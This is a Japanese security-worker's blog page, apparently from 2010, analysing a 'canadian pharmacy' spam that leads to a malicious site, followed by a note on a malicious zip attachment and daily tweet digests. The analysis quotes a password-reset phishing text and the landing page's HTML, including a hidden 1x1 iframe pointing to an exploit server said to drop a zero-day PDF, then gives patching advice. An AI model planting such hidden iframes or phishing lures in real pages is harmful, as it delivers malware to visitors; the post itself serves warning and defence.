

【今日のウイルスメール】canadian pharmacy

以前のアンジェリーナ・ジョリーメールあたりから大量に来ている、canadian pharmacyスパムを装ったウイルス誘導メール。← 迷惑メールを装うって何だ!(爆)

大体HTMLメールで文面は様々だが、。リンクをクリックすると、適当なところに飛ばされる。
ちなみに今回は、
「Reset your メールのドメイン名 password」
本文
Reset your メールのドメイン名 password
Hello, メールアドレス.

We received your request to reset your メールのドメイン名 password. To confirm your request and reset your password, follow the instructions below. Confirming your request helps prevent unauthorized access to your account.
If you didn't request that your password be reset, please follow the instructions below to cancel your request.
CONFIRM REQUEST AND RESET PASSWORD
Click on the following web address:

で、クリックすると、たとえば h○○p://sonda.co.kr/index2.html に飛ばされる。

このindex2.htmlの内容は、以下のような感じ。


PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=h○○p://pullkeep.com" /> ↓ 通常の「canadian pharmacy」へ飛んでいく。
canadianpharmacy.jpg
↑ ちなみにIPの存在場所は中国。(aguseでの情報)
ip.jpg
↓問題はこれ。
<iframe src='h○○p://ads.compressyourmortgage.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>


多くの人は、いつも来ている「canadian pharmacy」としか思わないし、実際にクリックしても「canadian pharmacy」が表示されるので安心している。裏で本命iframeタグが動作して「:8080/index.php?pid=10」に飛ばされている。

「ジェペットさん=の中の人」に聞いてみると、ゼロデイのPDFが落ちてくるそうだ。でも、昨日アドビから修正リリースが出ているので、対策ちゃんとやっておこう!

アドビリーダを起動して、一番右の「ヘルプ」をクリックし「アップデートの有無をチェック」。
あとついでに、悪用されることも多いJavaScriptを無効化しておこう。「編集」メニューの一番下の「環境設定」をクリック。「javascript」をクリックし、右側の「Acrobat JavaScriptを使用(J)」のチェックを外しておこう

ちなみにジェペットおじさんは家に転がり込んできた松の木で「ピノッキオ」を作ったそうだ。なるほど!松の木から作られたピノッキが、鯨の中で、飲み込まれていたジェペットと会ったのは必然ということか。(笑)←一部受け

06/29のツイートまとめ

dry2

オヤジはチビにインジェクション。 QT @Akira_Murakami: オヤジはだめなんだ...RT @dry2 お子様にチャレンジ情報! http://bit.ly/9TsqrZ 「第6回 IPA情報セキュリティ標語・ポスター」募集のお知らせ
06-29 22:58

そうだと思います。エコプログラミング。プログラムによるco2削減。数値化出来ると良いですね。IPAとかやってなかったっけ? QT @tacozzy: 電力への配慮がプログラマに求められてくるのかな? QT @dry2 アンドロイドでも電力を消費するアプリは削除される。
06-29 10:42

アンドロイドでもそうだがバックグラウンドで動く電力を消費するアプリは削除される。 QT @NobMiwa: iPhone,iPadのプログラミングでは、マルチスレッドはなるべくさけるべき、とAppleが推奨しているが、マルチスレッドになれたプログラマには発想の転換が必要になる
06-29 09:08

ブログをアップしました。 【今日のウイルスメール】久しぶりに → http://am6.jp/9L7RgG
06-29 09:01

ブログをアップしました。 06/28のツイートまとめ → http://am6.jp/afoQaf
06-29 09:01

【今日のウイルスメール】久しぶりに

先日、PCが死にました。

会社の連中に話したら、それは先日のアンジェリーナ・ジョリーのウイルス難読化された誘導スクリプト付きメールを踏んだからだとか、揶揄されてましたが、どうも電源がアウトだったようで、、

でも、その後の修理手順で失敗し、起動ディスクが飛びました。(涙)

いろいろ考えたのですが、少し非力ですが別マシンで自宅の母艦を復帰させました。今度、秋葉でパワーのある中古マシンを仕入れてこようと思っています。

母艦が不在の間も、ウイルスメールは死ぬほど来てたのですが、今朝来ていたものだけアップします。


差出人
"Patti Holman" <bettersnx4@rovema.com>

サブジェクト
Statement of fees 2009/2010

本文
Please find attached a statement of fees as requested, this will be posted today.
The accommodation is dealt with by another section and I have passed your request on to them today.

Kind regards.
Patti Holman

添付ファイル
Fees_2009-2010.zip

MD5: 4419f2c12530280f21d8b6ff664fabde
First received: 2010.06.28 12:38:11 UTC
日付: 2010.06.28 20:28:34 UTC [<1D]
結果: 12/41
ウイルスチェック結果

続きを読む

06/28のツイートまとめ

dry2

一人分終わった。 QT @dry2: 昨晩、酔っぱらって帰宅。パブコメまとめてたら、そのまま寝落ち。12時締め切り。間に合うのか?しかも、二人分。
06-28 09:29

ブログをアップしました。 06/27のツイートまとめ → http://am6.jp/buGghH
06-28 09:00

昨晩、酔っぱらって帰宅。パブコメまとめてたら、そのまま寝落ち。12時締め切り。間に合うのか?しかも、二人分。
06-28 07:34

06/27のツイートまとめ

dry2

今日はゆっくり下さい。QT @tacozzy: 茹で上がりました。無事生還なう。 RT @dry2: そういえば、タコ爺さん。頑張っているだろうか。
06-27 22:20

ブログをアップしました。 06/26のツイートまとめ → http://am6.jp/95AsUp
06-27 14:22

アキバで降りて歩こう。昨日もアキバ。しこたま歩いた。
06-27 12:45

お出掛け中。
06-27 12:41

そういえば、タコ爺さん。頑張っているだろうか。
06-27 12:40

(T-T) QT @prettyelmo_: @dry2 浮気の代償が高くついたみたいですね…w
06-27 10:06

06/26のツイートまとめ

dry2

マシン。結局、復活ならず。調子が悪くなった時に手を入れておけば良かった。反省。別のマシンを母艦に仕立てよう。
06-26 21:14

街頭演説。禁止したらどうかな。本質があぶり出される気がする。
06-26 17:47

I'm at 吉野家秋葉原中央通り店. http://4sq.com/d1gwas
06-26 17:41

結婚式は勉強になる。
06-26 15:53

キャンドルサービス http://ustre.am/:xafC
06-26 15:18

退場 お母さんと http://ustre.am/:xa47
06-26 14:24

乾杯 http://ustre.am/:x9UG
06-26 13:53

鏡開き http://ustre.am/:x9SG
06-26 13:49

まさき結婚式 入場 http://ustre.am/:x9OD
06-26 13:36

記念撮影 http://ustre.am/:x9JQ
06-26 13:20

続きを読む

06/25のツイートまとめ

dry2

htc desire 電源ダウン時には「シャットダウン中」と表示される。携帯なんだけどな。
06-25 09:25

ブログをアップしました。 06/24のツイートまとめ → http://am6.jp/9TvXkH
06-25 09:01

高校性なら良いので、どこかに入学して応募しますか? (笑) RT @Akira_Murakami: オヤジはだめなんだ?(笑)RT @dry2 お子様にチャレンジ情報! http://bit.ly/9TsqrZ 「第6回 IPA情報セキュリティ標語・ポスター」募集のお知らせ
06-25 08:06

脱藩はいかんぜよ。 http://bit.ly/axI0Sn
06-25 08:05

お子様にチャレンジ情報! http://bit.ly/9TsqrZ 「第6回 IPA情報セキュリティ標語・ポスター」募集のお知らせ
06-25 08:02

お祭りが続くなあ。
06-25 06:39

抗菌コート商売始めるかな。 QT @4416_310: それなら水洗いできないと大変ですよねw RT @dry2: 丸洗い出来るiPadやアンドロイドが出来ると見た。
06-25 06:32

正直、どらには必要ないのですが他の方が気にするのではないかと。(笑) QT @prettyelmo_: どらさんに必須だから?(笑)RT @dry2 丸洗い出来るiPadやアンドロイドが出来ると見た。
06-25 06:30

06/24のツイートまとめ

dry2

片山、佐藤って参議院ででるんだ。根性ないというより、ひとがいないのか。
06-24 23:06

男性党ってないのか?潰されそう。
06-24 23:04

いつもノーガード戦法と煽り弱いものいじめする方々もこう言うことには沈黙か? QT @dry2: 殺人未遂だと!?その前に盗られるなよ。拳銃。盗られた罪は問われないのか?
06-24 22:56

殺人未遂だと!?その前に盗られるなよ。拳銃。盗られた罪は問われないのか?
06-24 22:53

出てこい!隠れトイレiPad! QT @Kanechiki: そして朝から水没を恐る毎日が始まるのでありました。つるかめつるかめ。RT @kmzk: お父さん、トイレにiPad持って入らないで! 時代は、新聞からiPadへ。 RT @dry2: 告白。トイレでiPadや
06-24 22:47

丸洗い出来るiPadやアンドロイドが出来ると見た。
06-24 22:17

告白。トイレでiPadやアンドロイドを使ってます。だって本の替わりなんだもん。
06-24 22:15

ラーメン梯子にジンギスカン。トウモロコシにポテトバター。 QT @Smatsukichi: いやぁ?ほんと忙しい@札幌。忙しい、忙しい。
06-24 18:18

南北線。方向よく間違える。また、逆に乗った。遅刻だな。
06-24 18:16

良い天気。 http://twitpic.com/1zh064
06-24 17:49

続きを読む

06/23のツイートまとめ

dry2

例の例会ですか?誰かがきっちりご案内できると思います。 RT @cchanabo: 金曜日に浸かってもいいですか?タオルは持参します(笑)! RT @dry2: 秘密基地の屋上です。ビルの工事中には来ましたが、その後は初めてです。
06-23 17:37

秘密基地の屋上です。ビルの工事中には来ましたが、その後は初めてです。 QT @cchanabo: え、どこに??? RT @dry2: QT @dry2: 初めて来ました。 http://twitpic.com/1z6igr http://twitpic.com/1z6j8w
06-23 15:10

QT @dry2: 初めて来ました。 http://twitpic.com/1z6igr http://twitpic.com/1z6j8w
06-23 14:57

初めて来ました。 http://twitpic.com/1z6igr
06-23 14:53

アライ出し は Flashのゼロディ分析か http://bit.ly/97Ki41
06-23 10:17

喚んだわけでもありません。聞いただけです。キッパリ! QT @yumano: いいなぁ・・・ RT @dry2: 舞妓さんがいるところに行った訳では無いですよ!! RT @dry2: 舞妓さんの超法規?対応の事を言っていた。花街の伝統があるので、未成年でもお酒・煙草・接客はokと
06-23 09:02

ブログをアップしました。 06/22のツイートまとめ → http://am6.jp/cUioRW
06-23 09:01

合議で、ビジネス継続は出来ない。
06-23 08:17

そういうチャレンジもしてない。ノーリスクビジネスジャパン!(笑) RT @naonee: iPadやiPhonのようなモノが出てきたら、昔の日本なら徹底的にマネをして、本家よりいいモノを出していた。今はパクリとか言われるので違ったモノにしようとして失敗している。ような気がする。
06-23 08:16

SBの3Gにそんな余裕無いのでは?料金とったらむしろクレームになると思う。 RT @mhdt: 「iPhoneがモバイルルータに? …」…そのせいで料金が高くなるのはいやだな。せめて別料金にしてもらいたい。 http://ow.ly/21YdH
06-23 08:14

続きを読む

06/22のツイートまとめ

dry2

さて、帰ろう。撤収。
06-22 23:50

踏んだ気がする。 QT @ymzkei5: 私ってどうして可愛い女子が近くにいるだけで冷や汗が止まらないんだろう? RT @dry2: ヒキガエルのように汗をかいてしまうのか? QT @cchanabo: どうして夏場にごはんを食べるだけで滝のように汗をかいちゃうんだろう・・・。
06-22 23:25

どらってどうして座っているだけでヒキガエルのように汗をかいてしまうのか?体が毒素にで出来ているからだろうか? QT @cchanabo: ワタシって、どうして夏場にごはんを食べるだけで滝のように汗をかいちゃうんだろう・・・。ホントに汗っかきな体質なんだよね。。。
06-22 22:41

会社ぐるみじゃないのかな?個人で出来る金額じゃ無いと思うけど。大相撲のようにならなければ良いけど。 QT @pontamojya: 「システム入札情報入手に賄賂」、特許庁審判官とNTTデータ社員を逮捕 - ニュース:ITpro http://bit.ly/bUA6YW
06-22 22:16

休暇分散化アイデアボックス って 何? しょうもないように感じるのはどらだけだろうか?
06-22 20:13

L社のKさんは迷っているようです。あと、Yさんとか。 RT @uemat7: 実機触ってみて大差なかったら、それもありですね! RT @dry2: iPhone を買おうかまよっているひと。4を買った人から安く譲ってもらう、とか。
06-22 12:18

遅刻だー。
06-22 11:08

iPhone を買おうかまよっているひと。4を買った人から安く譲ってもらう、とか。
06-22 09:12

ブログをアップしました。 06/21のツイートまとめ → http://am6.jp/cv26hC
06-22 09:01

大相撲。解散して力士+αを国家公務員にして、興業。上がりは全て国庫というのは?いずれにせよ、逃げ得をださないように。
06-22 08:52

続きを読む

06/21のツイートまとめ

dry2

美女と饅頭怖い。 QT @cchanabo: ひこざ、美女に囲まれる刑が有効なのは、@ymzkei5 ぐらいよ。。。 RT @dry2: !肉抜き美女! RT @dry2: !!!!羨ましい。「美女系魑魅魍魎との合コンに放りこむの刑>@ymzkei5 @uemat7:
06-21 23:57

本件、報道じゃ分からないけど、文部省の日和見はどうなんだとも言いたい。 QT @tacozzy: 激しく同意です。ここ数日の大相撲ネタに吐き気をもよおしています。この際、閉ざされた世界が如何に貧しく脆弱であるかを明らかにし、リセット。そして誰か決めたか知らんが国技などと厚かましい
06-21 23:56

!肉抜き美女! QT @cchanabo: ひこざの場合はまんま「肉抜きの刑RT @dry2: !!!!羨ましい。「美女系魑魅魍魎との合コンに放りこむの刑>@ymzkei5」 QT @cchanabo @ymzkei5 @uemat7:
06-21 23:24

!!!!羨ましい。「美女系魑魅魍魎との合コンに放りこむの刑>@ymzkei5」 QT @cchanabo @ymzkei5 @uemat7:
06-21 23:15

大相撲。一回、無くなった方が良い。それとは別に私的なギャンブルへの考え方も整理したらどうか。
06-21 23:06

多分、一番へこたれるのがどらだな。 QT @ymzkei5: @dry2 まー、これくらいでへこたれる@uemat7じゃないですけどw
06-21 23:02

あー、いや、手紙のような会話が良いかなと。あー、いや、ごめんなさい。シュン。 QT @ymzkei5: うら若き女子になんてこと言うんですかwww @cchanaboせんせーとかならともかく!(ぇw QT @dry2: やだ!SMtpが良い! @ymzkei5 @uemat7
06-21 22:57

やだ!SMtpが良い! QT @ymzkei5: プロトコルを選べば良いのです! HTTPならきっと入り込み放題! QT @uemat7: 心と心のファイアウォールですとか…(ぎゃふん QT @dry2: どこの隙間だろうか? QT @uemat7: 二人の間に私の入る隙なんて
06-21 22:46

歩いていると暇なもので。(笑) QT @satoruf: @dry2 お疲れさまです、歩きながら携帯でつぶやくなんて芸当がすごい
06-21 22:39

どこの隙間だろうか? QT @uemat7: 二人の間に私の入る隙なんてないわ…よよよ(泣) QT @ymzkei5: .@uemat7と私がラブラブ!!のほうでよろしくお願いします♪w QT @dry2: ふふふ。 QT @ripjyr: いつもこの二人ラブラブだなぁw、
06-21 22:15

続きを読む

06/20のツイートまとめ

dry2

ブログをアップしました。 【暑くなる前に】金曜からのぶらぶら → http://am6.jp/bRt4YV
06-20 19:48

へー。 QT @amannk: 各国の「サイバー戦」軍備(人民網日本語版) http://bit.ly/aMRJ9P
06-20 19:42

港区の木は花水木。花はバラだそうです。そろそろ終わりかと思いますが。 QT @prettyelmo_: @dry2 薔薇の花、素敵です!
06-20 18:35

光の道構想は平成の列島改造論なのか。
06-20 18:33

政府広報テレビコマーシャル。高校無償化と子供手当て。政府広報じやなく民主党の宣伝では?
06-20 18:02

芝浦中央公園。散歩ちう。 http://twitpic.com/1ydc5q
06-20 15:54

I'm at 芝浦中央公園ドッグラン. http://4sq.com/duPhWo
06-20 15:47

電子署名の場合はどうするのだろうか?(笑) QT @Mizuike: 判子の押し方について。気に入らない文書にいやいや判子を突くときに、わざと逆さまや斜めにして押していた先輩がいた。ささやかな抵抗とみるか、大人げないと見るか。
06-20 15:24

I'm at JR 品川駅 山手線ホーム (品川駅, 港区). http://4sq.com/a8lts6
06-20 15:19

I'm at JR 京都駅 (下京区東塩小路高倉町8-3, 京都市). http://4sq.com/92Anu0
06-20 13:01

続きを読む

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り
